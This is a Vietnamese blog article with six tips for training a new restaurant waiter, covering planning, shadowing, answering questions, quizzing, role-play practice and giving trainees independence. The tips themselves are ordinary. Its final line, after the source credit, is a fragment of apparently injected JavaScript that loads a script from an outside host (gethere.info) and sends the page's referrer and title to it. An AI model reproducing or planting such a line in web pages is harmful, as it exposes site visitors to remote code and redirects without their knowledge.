6 mẹo nhỏ để huấn luyện một nhân viên phục vụ bàn mới

Sẽ thật tự hào nếu như sếp của bạn chỉ định bạn huấn luyện cho một nhân viên phục vụ mới. Điều đó có nghĩa là anh ấy/cô ấy đánh giá cao khả năng của bạn hay bạn đang làm tốt nhiệm vụ của mình. Hãy dành chút thời gian chúc mừng chính mình vì bạn là một người phục vụ tuyệt vời!

huan-luyen-nhan-vien-phuc-vu-moi (5)

Nhưng điều gì sẽ xảy ra khi bạn không chắc chắn về cách đào tạo một người nào đó? Bạn có thể đã có một thời gian làm việc khá lâu, là một người nhiều kinh nghiệm nhất trong số nhân viên nhà hàng nhưng khía cạnh dạy lại cho người khác những điều bạn biết để anh ấy/cô ấy có thể làm được như bạn lại là một điều hoàn toàn khác. Đó lại thiên về kỹ năng. Một số nhà hàng có chính sách đào tạo nghiêm ngặt nhưng người quản lý sẽ ném nó cho bạn, vì vậy, hãy chuẩn bị nếu tình huống này xảy ra.

Tất nhiên, có một số điều cần lưu ý khi đào tạo, người bạn nhận đào tạo đã có kinh nghiệm gì chưa. Người càng có nhiều kinh nghiệm, bạn càng khó uốn nắn họ theo cách của mình, còn nếu những người lần đầu tiên làm công việc này lại khác.

Dù bằng cách nào, dưới đây 6 lời khuyên về cách đào tạo một người phục vụ mới:

#1 Lập kế hoạch

Có rất nhiều điều cần phải dạy một người mà chúng ta thậm chí còn không biết bắt đầu từ đâu. Nếu bạn nhận được đủ thông tin từ người quản lý trong những ngày đầu tiên, bạn sẽ có thời gian để chuẩn bị một danh sách những thứ cần phải dạy cho một người mới. Vậy, điều đầu tiên bạn muốn chỉ cho họ là gì? Điều quan trọng nhất mà một người phục vụ cần nhớ là gì? Họ cần phải học những gì để hiểu được cách vận hành của nhà hàng mình đang làm việc?

huan-luyen-nhan-vien-phuc-vu-moi (4)

Dưới đây là một ví dụ về một danh sách công việc ưu tiên, bắt đầu từ ngày đầu tiên của quá trình đào tạo:

  • Kiến thức về thực đơn;
  • Kiến thức về những loại rượu (nếu có);
  • Hiểu biết về số bàn phục vụ, khu vực quầy bar,…;
  • Một vòng quanh nhà hàng để biết vị trí của phòng tắm, bếp nấu, kệ rửa tay, tủ đá,…;
  • Làm sạch công trình phụ và những công việc ngoài lề;
  • Những việc trong nhà hàng (Làm thế nào để bê đồ uống từ quầy bar đến bàn khách, tương tự với đĩa Salad, súp, thức ăn nóng,…);
  • Làm thế nào để chào đón khách hàng (câu nói, cử chỉ, hành động mở cửa và đóng cửa);
  • Làm thế nào đặt đơn hàng;
  • Làm thế nào để chuyển các đơn đặt hàng đến quầy thanh toán (hệ thống POS);
  • Những vấn đề liên quan đến khách hàng;
  • Làm sạch lại đồ dùng;
  • Báo cáo bán hàng vào cuối ca;
  • Nội quy của nhà hàng.

Hãy chắc chắn rằng bạn làm theo một lịch trình nhất định để việc đào tạo trở nên có nghĩa. Bạn không muốn để họ bắt đầu khi họ thậm chí còn chưa rõ về cách thức đặt đơn hàng hay chỉ mới ghi nhớ thực đơn (phải có ít nhất 85% số học viên mới thuộc lòng thực đơn nhà hàng trong ngày đào tạo đầu tiên). Việc chuẩn bị một danh sách chi tiết sẽ giúp bạn không bỏ sót một bước quan trọng nào trong quá trình đào tạo.

#2 Theo sát

huan-luyen-nhan-vien-phuc-vu-moi (3)

Đây là một bước rất quan trọng. Bạn nên ở bên cạnh họ trong khoảng thời gian đầu bởi chắc chắn dù là ứng viên xuất sắc nhất cũng có những lúc bỡ ngỡ và bạn chắc chắn sẽ không muốn họ làm xấu mặt nhà hàng của mình trước khách hàng. Hãy nói với họ lưu ý cách bạn nói chuyện với khách hàng, nhịp điệu, giọng nói, đặc điểm khuôn mặt, tư thế của bạn,…để có thể làm theo. Mỗi điều nhỏ nhặt nhưng lại đóng một vai trò cực kỳ quan trọng. Nếu nhà hàng của bạn đang muốn tăng doanh số bán hàng và chạy nhiều chương trình khuyến mại, bạn cần những người mới phải nắm bắt công việc một cách nhanh nhất, điều này cực kỳ cần thiết.

Điều quan trọng là những phục vụ mới phải nắm bắt được tốc độ phục vụ tại nhà hàng để bắt kịp nó. Họ phải hiểu số lượng khách hàng, nắm rõ thời gian khách hàng vào nhà hàng cho đến khi họ nhận được món ăn/đồ uống đầu tiên. Không được để khách hàng đợi quá lâu. Bạn cũng nên nhắc nhở họ thường xuyên, luôn theo sát mỗi bước đi của họ không có nghĩa là bạn tạo cho họ những áp lực công việc. Điều này đòi hỏi sự khéo léo và tinh tế trong cách nhìn nhận của bạn.

#3 Giải đáp mọi thắc mắc

Đừng ngại việc trả lời những câu hỏi ngây ngô từ người mới bởi có thể họ hoàn toàn chưa biết gì về công việc này, bạn cần trả lời một cách thật lịch sử chứ không phải theo cách giáo huấn. Điều này có vẻ như khá bình thường với bạn bởi những kiến thức về công việc bạn nắm quá rõ để trả lời bất cứ câu hỏi nào, điều khó ở đây là cách bạn diễn đạt lại cho họ hiểu và câu trả lời của bạn có giá trị với họ. Hãy lưu ý và nhắc nhở khi họ hỏi những câu hỏi tương tự nhau và cũng để họ tự mình tìm hiểu về công việc, những điều họ có thể tự làm mà không cần nhờ đến bạn. Sau khi họ hỏi sau, bạn có thể đặt câu hỏi lại hỏ để kiểm tra những gì họ đã nắm được và nếu có ai không thể giữ lại bất cứ điều gì, hãy cho họ một “lá cờ đỏ” (quy định về màu sắc thẻ phạt).

huan-luyen-nhan-vien-phuc-vu-moi (2)

#4 Đặt câu hỏi

Đây là cách tốt nhất để bạn tìm hiểu và nhận định lại khả năng tiếp thu của mỗi học viên một cách chính xác. Yêu cầu họ mô tả một số món ăn trong thực đơn. Nếu họ vấp hoặc chỉ là những mô tả thoáng qua, hãy chỉ lại cho họ chính xác về điều đó và nhắc nhở họ thực hành. Hoặc yêu cầu họ đọc tên tất cả các loại bia nhà hàng cung cấp,…Bạn cũng nên chỉ cho họ cách trả lời nếu như khách hàng có vô tình hỏi họ về điều này, phải trả lời theo thứ tự nhất định như chủng loại, giá tiền,….

Đôi khi những cuộc hỏi đáp như thế này, bạn không cần phải nhắc nhở họ trước mà có thể chọn ngẫu nhiên một thời gian bất kỳ để họ không kịp chuẩn bị gì.

#5 Thực hành

huan-luyen-nhan-vien-phuc-vu-moi (1)

Hãy giả vờ bạn là một người khách hàng đến nhà hàng để thưởng thức bữa tối. Họ cần phải phục vụ như những vị khách thực sự. Có thể gọi đây là diễn kịch cũng không sai. Nếu bạn coi đó là điều ngớ ngẩn thì cũng đúng một chút nhưng cách này có thể giúp nhân viên mới làm quen với công việc nhanh hơn chỉ là những lý thuyết đơn thuần và bạn có thể xem họ phản ứng thế nào khi đối mặt với một khách hàng thực sự. Cho dù là thực hành nhưng bạn cũng cần đảm bảo họ làm sai càng ít càng tốt, bởi những sai lầm liên tiếp có thể dẫn đến một thói quen xấu và khó có thể chỉnh lại được.

#6 Tạo cho họ một không gian

Nếu thực tập sinh của bạn nắm bắt công việc nhanh chóng và đang bắt đầu có những cảm giác thực tế đầu tiên, bạn hãy dành cho họ một chút không gian. Xem họ làm thế nào khi ở một mình. Hãy để họ mắc một vài lỗi nhỏ rồi tự khắc phục, rút ra kinh nghiệm nhưng bạn phải đảm bảo điều đó không làm ảnh hưởng đến trải nghiệm ăn uống của khách hàng. Đó là cách tốt nhất để xem nếu họ có khả năng xử lý công việc hay không và để họ có được một cảm giác thực sự như những gì họ mong đợi.

Bây giờ bạn đã thiết lập xong các vấn đề cơ bản của quá trình đào tạo một người phục vụ mới. Tất nhiên, có rất nhiều chi tiết nhỏ khác, nhưng điều này sẽ giúp cho bạn có một cái nhìn tổng quan về những gì cần phải làm và thủ thuật làm thế nào để tận dụng tốt nhất những thực tập sinh trong nhà hàng của bạn.

(Nguồn: Thewaitressconfessions.wordpress)

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;